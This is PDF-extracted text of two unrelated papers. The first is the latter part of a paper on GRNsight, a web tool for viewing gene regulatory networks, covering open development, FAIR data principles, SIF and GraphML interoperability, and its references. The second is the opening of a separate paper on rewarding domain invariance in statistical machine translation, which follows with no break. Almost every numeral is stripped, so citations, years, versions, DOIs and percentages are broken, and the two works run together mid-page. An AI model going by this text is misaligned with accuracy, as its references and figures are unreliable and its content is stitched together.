recognized by experts such as tufte ( ) and card, mackinlay & shneiderman ( ) as distinct from other forms of purely numeric, computational, or algorithmic data analysis, and as the preceding discussion highlights, it is this potential that can be derived specifically by visual inspection that is enabled by grnsight. card, mackinlay & shneiderman ( ) have identified six major ways, documented in earlier literature and empirical studies, by which information visualization amplifies cognition. tufte’s ( ) seminal book perhaps states it best: “graphics reveal data. indeed graphics can be more precise and revealing than conventional statistical computations.” note that the nodes in fig. f are also colored in the style of genmapp (salomonis et al., ), based on the time course of expression of that gene in the schade et al. ( ) microarray data (stripes from left to right, , , and min of cold shock, with magenta representing a significant increase in expression relative to the control at time zero, cyan representing a significant decrease in expression relative to the control, and grey representing nosignificant changein expression relative to thecontrol).thisfeaturehas not yet been implemented in grnsight, but is currently under development for version . these observations made by direct inspection of the grnsight graph are for a relatively small grn of genes and edges and become more difficult as nodes and edges are added. for much larger networks, a more powerful graph analysis tool such as cytoscape (shannon et al., ; smoot et al., ) or gephi (bastian, heymann & jacomy, ) is warranted. however, for small networks in the range of – nodes, grnsight dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ fulfills a need to quickly and easily view and manipulate them. the grn modeled in dahlquist et al. ( ) and displayed in fig. was derived from the lee et al. ( ) and harbison et al. ( ) datasets generated by chromatin immunoprecipitation followed by microarray analysis. we have also used grnsight to display grns derived from the yeastract database (teixeira et al., ), whose own display tool is static, displaying regulators and targets in two rows. instructions for viewing yeastract-derived grns can be found on the grnsight documentation page. while grnsight was designed originally for viewing grns, it is not specific for any particular species, nor for that kind of data. as long as the text strings used as identifiers for the “regulators” and “targets” match, it can be used to visualize any small, unweighted or weighted network with directed edges for systems biology or other application domains. grnsight development follows best practices for scientific computing and fair data principles veretnik, fink & bourne ( ) lament and schultheiss et al. ( ) document that some computational biology resources, especially web servers, lack persistence and usability, leading to an inability to reproduce results. with that in mind, we have consciously followed best practices for open development (prli�c & procter, ), scientific computing (wilson et al., ), providing a web resource (schultheiss, ), and fair data (wilkinson et al., ), simultaneously following and teaching these practices to the primary developers who were all undergraduates. each of these practices relates to each other, supporting reproducible research. open development and long-term persistence as noted in our process requirements in the introduction, we have followed an open development model since the project’s inception in january , with our code available under the open source bsd license at the public github repository, where we “release early, release often” (torvalds in raymond ( )) and also track requirements, issues, and bugs. indeed, our project stands on the shoulders of other open source tools. our unit-testing framework provides confidence that the code works as expected. detailed documentation for users (web page) and developers (wiki) are provided. demo data are also provided so users have both an example of how to format input files and can see how the software should perform. as noted by prli�c & procter ( ), open development practices have a positive impact on the long-term sustainability of a project. furthermore, schultheiss et al. ( ) describe twelve qualities for evaluating web services that sum to a long-term-score, which correlates with persistence of the web service. grnsight complies with all requirements, providing: a stable web address (using the github.io domain to host the website and amazon cloud services to host the server help to ensure long-term availability), version information, hosting country and institution, last updated date, contact information, high usability, no registration requirement, no download required, example data, fair testing possibility (both with demonstration excel workbooks and standard sif and graphml file types), and a functional service. dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we are committed to continue development of the grnsight resource, fixing bugs and improving the software by adding features. the lead authors (dahlquist, dionisio, and fitzpatrick) are all tenured faculty, overseeing the design, code, testing, and documentation of grnsight and providing continuity to the project. together we have mentored the undergraduates (anguiano, varshneya, southwick, and samdarshi) who had primary responsibility for coding, testing, and documentation, while also being full partners in the design of the software. a pipeline has been established for onboarding new members to the project, also providing continuity. lawlor & walsh ( ) detail some of the same issues of reliability and reproducibility in bioinformatics software referred to by wilson et al. ( ). lawlor & walsh ( ) conclude that the ideal way to bring software engineering values into bioinformatics research projects is to establish separate specialists in bioinformatics engineering. we disagree. through grnsight, we have shown how best practices can be taught to undergraduates concomitant with training in bioinformatics, as we have shown previously with master’s level students (dionisio & dahlquist, ). fair data principles the fair guiding principles for scientific data and stewardship state that data should be findable, accessible, interoperable, and reusable by both humans and machines (wilkinson et al., ), with “data” loosely construed as any scholarly digital research object, including software. as scientific software that interacts with data, the fair principles can apply to both the grnsight application and the network data it is used to visualize. thus, we evaluate the grnsight project in terms of its “fairness” below. findable the findable principle states that metadata and data should have a globally unique and persistent identifier, and that metadata and data should be registered or indexed in a searchable resource (wilkinson et al., ). in terms of software, the identifier is the name and version. because we utilize the github release mechanism, grnsight code is tagged with a version (currently v . . ) and each version is available from the release page (https://github.com/dondi/grnsight/releases). we have registered grnsight with well- known bioinformatics tools registries: the biojs repository (yachdav et al., ; http:// biojs.io/), the elixir tools and data services registry (ison et al., ; https://bio.tools/), bioinformatics.org (http://www.bioinformatics.org/wiki/), and the links directory at bioinformatics.ca (brazas, yamada & ouellette, ; https://bioinformatics.ca/links_ directory/), as well as node package manager (npm, https://www.npmjs.com/). grnsight has also been presented at scientific conferences, with slides and posters available via slideshare (http://www.slideshare.net/grnsight) and with a recent talk and poster at the bioinformatics open source conference available via f research (dahlquist et al., a; dahlquist et al., b). we have paid special attention to the metadata associated with our website to increase its findability via google search. and, of course, with the publication of this article, grnsight is findable in literature databases. in the everyday sense of the word “findable,” one could argue that by being “yet another” dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/dondi/grnsight/releases http://biojs.io/ http://biojs.io/ https://bio.tools/ http://www.bioinformatics.org/wiki/ https://bioinformatics.ca/links_directory/ https://bioinformatics.ca/links_directory/ https://www.npmjs.com/ http://www.slideshare.net/grnsight http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ network visualization tool in a crowded domain (recall other tools recorded by pavlopoulos et al. ( )), grnsight is contributing to a findability problem for users in the sense that it contributes more “hay” to the “needle in a haystack” problem of finding the right tool for the job. however, we hope that by the actions we have taken and the specificity of our requirements for grnsight’s functionality, publicly describing both what we mean it to be and what we do not mean it to be, the benefits of adding grnsight to the diverse pool of network visualization software outweighs the detriments. in addition, the findable principle states that data should be described with rich metadata and that metadata should include the identifier of the data it describes (wilkinson et al., ). because grnsight does not interact directly with a data repository, it is up to individual users to make sure that their data is fair compliant with the findable principle. this is discussed further below with regard to interoperability and reusability. accessible the accessible principle states that metadata and data should be retrievable by their identifier using a standardized communication protocol, that the protocol is open, free, and universally implementable, that the protocol allows for authentication and authorization procedures, where necessary, and that metadata are accessible, even when the data are no longer available (wilkinson et al., ). as noted before, grnsight meets the first two criteria, because it is free and open to all users, and there is no login requirement. the source code is available under the open source bsd license and can be npm installed (given the caveat that the user must be able to support the grnsight client-server setup). the longevity of grnsight is partially tied to the longevity of the github repository itself, although the authors maintain local backups. again, because grnsight does not interact directly with a data repository, it is up to individual users to make sure that their data is fair compliant with the accessible principle. since grnsight does not have any security procedures nor authentication requirements (e.g., password protection; user registration), it is not recommended that sensitive data be uploaded to our grnsight server. however, users who wish to visualize sensitive data could run a local instance of the grnsight client-server setup. interoperable as software, grnsight does not interact directly with other databases or software, as, for example, cytoscape does with many pathway and molecular interaction databases or individual cytoscape apps (formerly plugins; saito et al., ), so it is not interoperable in that sense. the grnsight web application is designed to interact directly with a human user and is not set up to import or export data programmatically, as would be necessary to incorporate it into popular workflow environments like galaxy (afgan et al., ) or be hosted by a tool aggregator such as qubes hub (quantitative undergraduate biology education and synthesis hub, https://qubeshub.org/). however, grnsight is interoperable in the sense that via the user, it can receive and pass data from and to other programs. in this latter sense, this section could just as easily have been entitled, “ % of dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://qubeshub.org/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ bioinformatics is getting your data into the right file format.” indeed, one of the original motivations and requirements for grnsight was to seamlessly read and display weighted grns that were output as excel workbooks from the grnmap matlab modeling package (dahlquist et al., ; http://kdahlquist.github.io/grnmap/). this specialized use case is augmented by grnsights’s ability to import and export data in the commonly used sif (http://manual.cytoscape.org/en/latest/supported_network_file_formats. html#sif-format) and graphml (brandes et al., ; http://graphml.graphdrawing.org/) formats, facilitating movement of data between grnsight and other network visualization and analysis programs. for instance, one can interact with the grnsight server component directly, in order to upload excel workbooks and supported import formats for conversion into json then back into a supported export format. thus, we are in a position to comment on sif and graphml with respect to the finer points of data interoperability, including: metadata and data using a formal, accessible, shared, and broadly applicable language for knowledge representation, metadata and data using vocabularies that follow the fair principles, and metadata and data including qualified references to other metadata and data (wilkinson et al., ). when we implemented import and export for the sif and graphml formats, we encountered issues due to the variations accepted by these formats which required design decisions that may, in turn, restrict compatibility with other software that we did not test. for example, the sif format as described in the documentation for cytoscape v . . offers quite a few divergent options, including choice of delimiter (space vs. tab), denoting a pairwise list of interactions versus concatenating all the interactions to the same node on the same line, and the choice of relationship type (any string). it only requires node identifiers to be internally consistent to the file, without enforcing the use of ids from a recognized biological database. while grnsight strives to read any sif file, we restricted our export format to tab-delimited, pairwise interactions, and a single relationship type (“pd” for “protein / dna”) for unweighted networks. for weighted networks, grnsight exports the weight value as the relationship type. the advantage of sif is that it is a simple text format; the main disadvantage is that all it is really intended to encode is the interaction between two nodes, which makes including the weight data as grnsight does a kludge, and including metadata impossible. moreover, there is no controlled vocabulary for the relationship type, only a list of suggestions in the cytoscape documentation, from which we selected “pd.” in practice, cytoscape v . . defaults to “interacts with” as the relationship type when exporting sif files. as a simple text format, it does not satisfy the three sub-principles of interoperability (wilkinson et al., ). in contrast, graphml, as a richer xml format, has the potential to satisfy the interoperability criteria. however, as with sif, we encountered issues because a feature of the format that is intended to facilitate flexibility has, in practice, turned out to degrade interoperability rather than enhance it. graphml standardizes only the representation of nodes and edges and their directions; all other characteristics, such as names, weights, and other values, are left for others to specify through a key element, which is not subject to a controlled vocabulary. although this flexibility is appreciated, it also serves as an enabler for divergence. in particular, two issues arose with interpreting the node dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://kdahlquist.github.io/grnmap/ http://manual.cytoscape.org/en/latest/supported_network_file_formats.html#sif-format http://manual.cytoscape.org/en/latest/supported_network_file_formats.html#sif-format http://graphml.graphdrawing.org/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ identifier and display label. first, because of the lack of a controlled vocabulary, these are defined differently by different programs. second, in the grnsight-native excel format, transcription factors must be unique in the header columns and rows and serve both as a unique id for that node and the node label. in two implementations of graphml import/ export that we tested with cytoscape v . . and a commercial graph editor called yed (v . , https://www.yworks.com/products/yed), an internal node id is assigned independently of the node label and is not editable by the user. this leads to a situation where the user could assign identical labels to two or more nodes with different ids, raising an issue for correct display of the network in grnsight where node id and node label are synonymous. grnsight accommodates display of node labels from cytoscape- and yed-exported graphml by using a priority system to select among the xml elements it may encounter. finally, as with sif, there is no enforcement of the use of ids from a recognized biological database, even though the potential exists to specify the id source (at least as a comment) in the xml. the format of a graphml export by grnsight is described on the documentation page (http://dondi.github.io/grnsight/documentation.html). in our testing, we have ensured that grnsight can read cytoscape- and yed-exported graphml and that grnsight-exported graphml was accurately read by these two programs, but we cannot guarantee interoperability with other software. any issues that arise will need to be addressed on a case-by-case basis through bug reports at our github repository. compliance with fair principles is facilitated by the biosharing registry of standards (mcquilton et al., ; https://biosharing.org). as of this writing, graphml is present in the registry, but as an unclaimed, automatically-generated entry. other formats for sharing network data are potentially more fully fair compliant. however, the addition of each new format, while increasing the flexibility and power of the grnsight software, would incur the cost of additional complexity (http://boxesandarrows.com/complexity- and-user-experience/). this is a corollary of “one thing well” and is, for example, one reason why the complex cytoscape stand-alone application did not fit our initial product requirements. as demonstrated by our tests with cytoscape- and yed-exported graphml, the aphorism that “ % of bioinformatics is getting your data into the right file format” cannot entirely be avoided by developers or users. reusable the fair principles state that metadata and data should be richly described with a plurality of accurate and relevant attributes, released with a clear and accessible usage license, associated with a detailed provenance, and meet domain-relevant community standards. as software, grnsight is reusable because the code is available on github under the open source bsd license. the advantage of having followed test-driven development is that a developer who wishes to reuse the code has a test suite ready to guide development of new features. in terms of data, the criteria for reusability are closely linked to interoperability. while the graphml format is capable of storing metadata, the limitations described above in terms of a lack of controlled vocabulary cause it to fail the reusability test as well. in terms of provenance, grnsight injects a comment into dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.yworks.com/products/yed http://dondi.github.io/grnsight/documentation.html https://biosharing.org http://boxesandarrows.com/complexity-and-user-experience/ http://boxesandarrows.com/complexity-and-user-experience/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the graphml recording what version of grnsight exported the data (as does yed v . , but not cytoscape v . . ). we also note that the grnmap excel workbook format with multiple worksheets has the potential to record both metadata and provenance, although this feature is not implemented at this time. in the end, even the examples given by wilkinson et al. ( ) have varying levels of adherence to the fair principles or “fairness,” which, they argue, should be used as a guide to the incremental improvement of resources. although grnsight has the limitations discussed above, we have done as much as we can to achieve fairness at this time. conclusions we have successfully implemented grnsight, a web application and service for visualizing small- to medium-scale grns that is simple and intuitive to use. grnsight accepts an input file in microsoft excel format (.xlsx), reading a weighted or unweighted adjacency matrix where the regulators are in columns and the target genes are in rows, and automatically lays out and displays unweighted and weighted network graphs in a way that is familiar to biologists. grnsight also has the capability of importing and exporting files in sif and graphml formats. although grnsight was originally developed for use with the grnmap modeling software, and has provided useful insight into the interpretation of the grn model described in dahlquist et al. ( ), it has general applicability for displaying any small, unweighted or weighted network with directed edges for systems biology or other application domains. thus, grnsight inhabits a niche not satisfied by other software, doing “one thing well.” grnsight also serves as a model for how best practices for software engineering support reproducible research and can be learned simultaneously with the development of useful bioinformatics software. acknowledgements we would like to thank katrina sherbina and b.j. johnson for their input during the early stages of grnsight development. we would also like to thank masao kitamura for assistance with setting up and administering the grnsight server. we thank the – grnmap research team, chukwuemeka e. azinge, juan s. carrillo, kristen m. horstmann, kayla c. jackson, k. grace johnson, brandon j. klein, tessa a. morris, margaret j. o’neil, trixie anne m. roque, and natalie e. williams, and the students enrolled in the loyola marymount university spring course biology - : biomathematical modeling/mathematics - : survey of biomathematics for testing the software. finally, we thank manuel corpas and an anonymous reviewer for suggestions that have improved both the grnsight code and this manuscript. additional information and declarations funding this work was partially supported by nsf award (k.d.d., b.g.f.), a kadner-pitts research grant (k.d.d.), the loyola marymount university summer undergraduate research program (a.v.) and the loyola marymount university rains research assistant dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ program (n.a.a.). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: nsf (k.d.d., b.g.f.): . kadner-pitts research grant (k.d.d.). loyola marymount university summer undergraduate research program (a.v.). loyola marymount university rains research assistant program (n.a.a.). competing interests the authors declare that they have no competing interests. author contributions � kam d. dahlquist conceived and designed the project, performed the computation work, analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. � john david n. dionisio conceived and designed the project, performed the computation work, analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. � ben g. fitzpatrick conceived and designed the project, performed the computation work, analyzed the data, reviewed and edited drafts of the paper. � nicole a. anguiano conceived and designed the project, performed the computation work, analyzed the data, reviewed drafts of the paper. � anindita varshneya conceived and designed the project, performed the computation work, analyzed the data, reviewed drafts of the paper. � britain j. southwick conceived and designed the project, performed the computation work, analyzed the data, reviewed drafts of the paper. � mihir samdarshi conceived and designed the project, performed the computation work, analyzed the data, reviewed drafts of the paper. data deposition the following information was supplied regarding data availability: github code repository: https://github.com/dondi/grnsight. web application: http://dondi.github.io/grnsight/. references afgan e, baker d, van den beek m, blankenberg d, bouvier d, čech m, chilton j, clements d, coraor n, eberhard c, grüning b, guerler a, hillman-jackson j, von kuster g, rasche e, soranzo n, turaga n, taylor j, nekrutenko a, goecks j. . the galaxy platform for accessible, reproducible and collaborative biomedical analyses: update. nucleic acids research (w ):w –w doi . /nar/gkw . alon u. . an introduction to systems biology: design principles of biological circuits. boca raton: chapman & hall/crc. dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/dondi/grnsight http://dondi.github.io/grnsight/ http://dx.doi.org/ . /nar/gkw http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ bastian m, heymann s, jacomy m. . gephi: an open source software for exploring and manipulating networks. in: third international aaai conference on weblogs and social media. vol. . palo alto: aaai publications, – . borneman ar, leigh-bell ja, yu h, bertone p, gerstein m, snyder m. . target hub proteins serve as master regulators of development in yeast. genes & development ( ): – doi . /gad. . bostock m, ogievetsky v, heer j. . d : data-driven documents. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . brandes u, eiglsperger m, herman i, himsolt m, marshall ms. . graphml progress report structural layer proposal. in: graph drawing: th international symposium, gd, vienna, austria, september – , revised papers. berlin heidelberg: springer, – . brazas md, yamada jt, ouellette bff. . providing web servers and training in bioinformatics: update on the bioinformatics links directory. nucleic acids research (suppl ):w –w doi . /nar/gkq . brown e. . web development with node and express. beijing: o’reilly. buchman ar, kornberg rd. . a yeast ars-binding protein activates transcription synergistically in combination with other weak activating factors. molecular and cellular biology ( ): – doi . /mcb. . . . card sk, mackinlay jd, shneiderman b. . chapter : information visualization. readings in information visualization: using vision to think. san diego: academic press. dahlquist kd, fitzpatrick bg, camacho et, entzminger sd, wanner nc. . parameter estimation for gene regulatory networks from microarray data: cold shock response in saccharomyces cerevisiae. bulletin of mathematical biology ( ): – doi . /s - - - . dahlquist kd, fitzpatrick bg, dionisio jdn, anguiano na, carrillo js, morris ta, varshneya a, williams ne, johnson kg, roque tam, horstmann km, samdarshi m, azinge ce, klein bj, o’neil mj. a. grnmap and grnsight: open source software for dynamical systems modeling and visualization of medium-scale gene regulatory networks [v ; not peer reviewed]. f research (iscb comm j): doi . /f research. . . dahlquist kd, fitzpatrick bg, dionisio jdn, anguiano na, carrillo js, roque tam, varshneya a, samdarshi m, azinge ce. b. grnmap and grnsight: open source software for dynamical systems modeling and visualization of medium-scale gene regulatory networks [v ; not peer reviewed]. f research (iscb comm j): doi . /f research. . . dionisio jdn, dahlquist kd. . improving the computer science in bioinformatics through open source pedagogy. acm sigcse bulletin ( ): – doi . / . . franz m, lopes ct, huck g, dong y, sumer o, bader gd. . cytoscape.js: a graph theory library for visualisation and analysis. bioinformatics ( ): – doi . /bioinformatics/btv . gostner r, baldacci b, morine mj, priami c. . graphical modeling tools for systems biology. acm computing surveys ( ): doi . / . harbison ct, gordon db, lee ti, rinaldi nj, macisaac kd, danford tw, hannett nm, tagne j-b, reynolds db, yoo j, jennings eg, zeitlinger j, pokholok dk, kellis m, rolfe pa, takusagawa kt, lander es, gifford dk, fraenkel e, young ra. . transcriptional regulatory code of a eukaryotic genome. nature ( ): – doi . /nature . dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /gad. http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . /nar/gkq http://dx.doi.org/ . /mcb. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /f research. . http://dx.doi.org/ . /f research. . http://dx.doi.org/ . / . http://dx.doi.org/ . /bioinformatics/btv http://dx.doi.org/ . / http://dx.doi.org/ . /nature http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ison j, rapacki k, ménager h, kalaš m, rydza e, chmura p, anthon c, beard n, berka k, bolser d, booth t, bretaudeau a, brezovsky j, casadio r, cesareni g, coppens f, cornell m, cuccuru g, davidsen k, vedova gd, dogan t, doppelt-azeroual o, emery l, gasteiger e, gatter t, goldberg t, grosjean m, grüning b, helmer-citterich m, ienasescu h, ioannidis v, jespersen mc, jimenez r, juty n, juvan p, koch m, laibe c, li j-w, licata l, mareuil f, mičeti�c i, friborg rm, moretti s, morris c, möller s, nenadic a, peterson h, profiti g, rice p, romano p, roncaglia p, saidi r, schafferhans a, schwämmle v, smith c, sperotto mm, stockinger h, va�reková rs, tosatto sce, de la torre v, uva p, via a, yachdav g, zambelli f, vriend g, rost b, parkinson h, løngreen p, brunak s. . tools and data services registry: a community effort to document bioinformatics resources. nucleic acids research (d ):d –d doi . /nar/gkv . lawlor b, walsh p. . engineering bioinformatics: building reliability, performance and productivity into bioinformatics software. bioengineered ( ): – doi . / . . . lee ti, rinaldi nj, robert f, odom dt, bar-joseph z, gerber gk, hannett nm, harbison ct, thompson cm, simon i, zeitlinger j, jennings eg, murray hl, gordon db, ren b, wyrick jj, tagne j-b, volkert tl, fraenkel e, gifford dk, young ra. . transcriptional regulatory networks in saccharomyces cerevisiae. science ( ): – doi . /science. . martin rc. . clean code: a handbook of agile software craftsmanship. upper saddle river: prentice hall. mcquilton p, gonzalez-beltran a, rocca-serra p, thurston m, lister a, maguire e, sansone s-a. . biosharing: curated and crowd-sourced metadata standards, databases and data policies in the life sciences. database: journal of biological databases and curation :baw doi . /database/baw . miyake t, reese j, loch cm, auble dt, li r. . genome-wide analysis of ars (autonomously replicating sequence) binding factor (abf p)-mediated transcriptional regulation in saccharomyces cerevisiae. journal of biological chemistry ( ): – doi . /jbc.m . ni l, bruce c, hart c, leigh-bell j, gelperin d, umansky l, gerstein mb, snyder m. . dynamic and complex transcription factor binding during an inducible response in yeast. genes & development ( ): – doi . /gad. . nielsen j. . usability engineering. boston: academic press. norman da. . the design of everyday things. new york: basic books. pavlopoulos ga, malliarakis d, papanikolaou n, theodosiou t, enright aj, iliopoulos i. . visualizing genome and systems biology: technologies, tools, implementation techniques and trends, past, present and future. gigascience ( ): doi . /s - - - . prli�c a, procter jb. . ten simple rules for the open development of scientific software. plos computational biology ( ):e doi . /journal.pcbi. . raymond es. . the cathedral & the bazaar: musings on linux and open source by an accidental revolutionary. beijing: o’reilly. saito r, smoot me, ono k, ruscheinski j, wang p-l, lotia s, pico ar, bader gd, ideker t. . a travel guide to cytoscape plugins. nature methods ( ): – doi . /nmeth. . dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /nar/gkv http://dx.doi.org/ . / . . http://dx.doi.org/ . /science. http://dx.doi.org/ . /database/baw http://dx.doi.org/ . /jbc.m http://dx.doi.org/ . /gad. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /nmeth. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ salomonis n, hanspers k, zambon ac, vranizan k, lawlor sc, dahlquist kd, doniger sw, stuart j, conklin br, pico ar. . genmapp : new features and resources for pathway analysis. bmc bioinformatics ( ): doi . / - - - . schade b, jansen g, whiteway m, entian kd, thomas dy. . cold adaptation in budding yeast. molecular biology of the cell ( ): – doi . /mbc.e - - . schultheiss sj. . ten simple rules for providing a scientific web resource. plos computational biology ( ):e doi . /journal.pcbi. . schultheiss sj, münch m-c, andreeva gd, rätsch g. . persistence and availability of web services in computational biology. plos one ( ):e doi . /journal.pone. . shannon p, markiel a, ozier o, baliga ns, wang jt, ramage d, amin n, schwikowski b, ideker t. . cytoscape: a software environment for integrated models of biomolecular interaction networks. genome research ( ): – doi . /gr. . shneiderman b, plaisant c, cohen m, jacobs sm, elmqvist n, diakopoulos n. . designing the user interface: strategies for effective human-computer interaction. hoboken: pearson. shore d, nasmyth k. . purification and cloning of a dna binding protein from yeast that binds to both silencer and activator elements. cell ( ): – doi . / - ( ) -x. smoot me, ono k, ruscheinski j, wang p-l, ideker t. . cytoscape . : new features for data integration and network visualization. bioinformatics ( ): – doi . /bioinformatics/btq . teixeira mc, monteiro pt, guerreiro jf, gonçalves jp, mira np, dos santos sc, cabrito tr, palma m, costa c, francisco ap, madeira sc, oliveira al, freitas at, sá-correia i. . the yeastract database: an upgraded information system for the analysis of gene and genomic transcription regulation in saccharomyces cerevisiae. nucleic acids research (d ): d –d doi . /nar/gkt . tufte er. . the visual display of quantitative information. cheshire: graphics press. veretnik s, fink jl, bourne pe. . computational biology resources lack persistence and usability. plos computational biology ( ):e doi . /journal.pcbi. . wilkinson md, dumontier m, aalbersberg ijj, appleton g, axton m, baak a, blomberg n, boiten j-w, da silva santos lb, bourne pe, bouwman j, brookes aj, clark t, crosas m, dillo i, dumon o, edmunds s, evelo ct, finkers r, gonzalez-beltran a, gray ajg, groth p, goble c, grethe js, heringa j, ’t hoen pac, hooft r, kuhn t, kok r, kok j, lusher sj, martone me, mons a, packer al, persson b, rocca-serra p, roos m, van schaik r, sansone s-a, schultes e, sengstag t, slater t, strawn g, swertz ma, thompson m, van der lei j, van mulligen e, velterop j, waagmeester a, wittenburg p, wolstencroft k, zhao j, mons b. . the fair guiding principles for scientific data management and stewardship. scientific data : doi . /sdata. . . wilson g, aruliah da, brown ct, chue hong np, davis m, guy rt, haddock shd, huff kd, mitchell im, plumbley md, waugh b, white ep, wilson p. . best practices for scientific computing. plos biology ( ):e doi . /journal.pbio. . yachdav g, goldberg t, wilzbach s, dao d, shih i, choudhary s, crouch s, franz m, garcı́a a, garcı́a lj, grüning ba, inupakutika d, sillitoe i, thanki as, vieira b, villaveces jm, schneider mv, lewis s, pettifer s, rost b, corpas m. . anatomy of biojs, an open source community for the life sciences. elife :e doi . /elife. . dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / - - - http://dx.doi.org/ . /mbc.e - - http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /gr. http://dx.doi.org/ . / - ( ) -x http://dx.doi.org/ . /bioinformatics/btq http://dx.doi.org/ . /nar/gkt http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /sdata. . http://dx.doi.org/ . /journal.pbio. http://dx.doi.org/ . /elife. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ grnsight: a web application and service for visualizing models of small- to medium-scale gene regulatory networks introduction materials and methods results and discussion conclusions flink references edinburgh research explorer adapting to all domains at once: rewarding domain invariance in smt citation for published version: hoang, c, sima'an, k & titov, i , 'adapting to all domains at once: rewarding domain invariance in smt', transactions of the association for computational linguistics, vol. , pp. - . <https://transacl.org/ojs/index.php/tacl/article/view/ > link: link to publication record in edinburgh research explorer document version: publisher's pdf, also known as version of record published in: transactions of the association for computational linguistics general rights copyright for the publications made accessible via the edinburgh research explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights. take down policy the university of edinburgh has made every reasonable effort to ensure that edinburgh research explorer content complies with uk legislation. if you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim. download date: . apr. https://transacl.org/ojs/index.php/tacl/article/view/ https://www.research.ed.ac.uk/portal/en/publications/adapting-to-all-domains-at-once-rewarding-domain-invariance-in-smt( cc -f a - e - b - d ).html adapting to all domains at once: rewarding domain invariance in smt hoang cuong and khalil sima’an and ivan titov institute for logic, language and computation university of amsterdam science park , xg amsterdam, the netherlands {c.hoang,k.simaan,titov}@uva.nl abstract existing work on domain adaptation for statis- tical machine translation has consistently as- sumed access to a small sample from the test distribution (target domain) at training time. in practice, however, the target domain may not be known at training time or it may change to match user needs. in such situations, it is natural to push the system to make safer choices, giving higher preference to domain- invariant translations, which work well across domains, over risky domain-specific alterna- tives. we encode this intuition by ( ) in- ducing latent subdomains from the training data only; ( ) introducing features which mea- sure how specialized phrases are to individual induced sub-domains; ( ) estimating feature weights on out-of-domain data (rather than on the target domain). we conduct experiments on three language pairs and a number of differ- ent domains. we observe consistent improve- ments over a baseline which does not explic- itly reward domain invariance. introduction mismatch in phrase translation distributions be- tween test data (target domain) and train data is known to harm performance of statistical transla- tion systems (irvine et al., ; carpuat et al., ). domain-adaptation methods (foster et al., ; bisazza et al., ; sennrich, b; raz- mara et al., ; sennrich et al., ; haddow, ; joty et al., ) aim to specialize a system estimated on out-of-domain training data to a target domain represented by a small data sample. in prac- tice, however, the target domain may not be known at training time or it may change over time depend- ing on user needs. in this work we address exactly the setting where we have a domain-agnostic system but we have no access to any samples from the tar- get domain at training time. this is an important and challenging setting which, as far as we are aware, has not yet received attention in the literature. when the target domain is unknown at training time, the system could be trained to make safer choices, preferring translations which are likely to work across different domains. for example, when translating from english to russian, the most natural translation for the word ‘code’ would be highly de- pendent on the domain (and the corresponding word sense). the russian words ‘xifr’, ‘zakon’ or ‘programma’ would perhaps be optimal choices if we consider cryptography, legal and software devel- opment domains, respectively. however, the transla- tion ‘kod’ is also acceptable across all these domains and, as such, would be a safer choice when the tar- get domain is unknown. note that such a transla- tion may not be the most frequent overall and, con- sequently, might not be proposed by a standard (i.e., domain-agnostic) phrase-based translation system. in order to encode preference for domain- invariant translations, we introduce a measure which quantifies how likely a phrase (or a phrase-pair) is to be “domain-invariant". we recall that most large parallel corpora are heterogeneous, consisting of di- verse language use originating from a variety of un- specified subdomains. for example, news articles may cover sports, finance, politics, technology and a variety of other news topics. none of the sub- domains may match the target domain particularly transactions of the association for computational linguistics, vol. , pp. – , . action editor: philipp koehn. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. well, but they can still reveal how domain-specific a given phrase is. for example, if we would ob- serve that the word ‘code’ can be translated as ‘kod’ across cryptography and legal subdomains observed in training data, we can hypothesize that it may work better on a new unknown domain than ‘zakon’ which was specific only to a single subdomain (le- gal). this would be a suitable decision if the test domain happens to be software development, even though no texts pertaining to this domain were in- cluded in the heterogeneous training data. importantly, the subdomains are usually not spec- ified in the heterogeneous training data. therefore, we treat the subdomains as latent, so we can induce them automatically. once induced, we define mea- sures of domain specificity, particularly expressing two generic properties: phrase domain specificity how specific is a target or a source phrase to some of the induced sub- domains? phrase pair domain coherence how coherent is a source phrase and a target language translation across the induced subdomains? these features capture two orthogonal aspects of phrase behaviour in heterogeneous corpora, with the rationale that phrase pairs can be weighted along these two dimensions. domain-specificity captures the intuition that the more specific a phrase is to certain subdomains, the less applicable it is in gen- eral. note that specificity is applied not only to tar- get phrases (as ‘kod’ and ‘zakon’ in the above ex- ample) but also to source phrases. when applied to a source phrase, it may 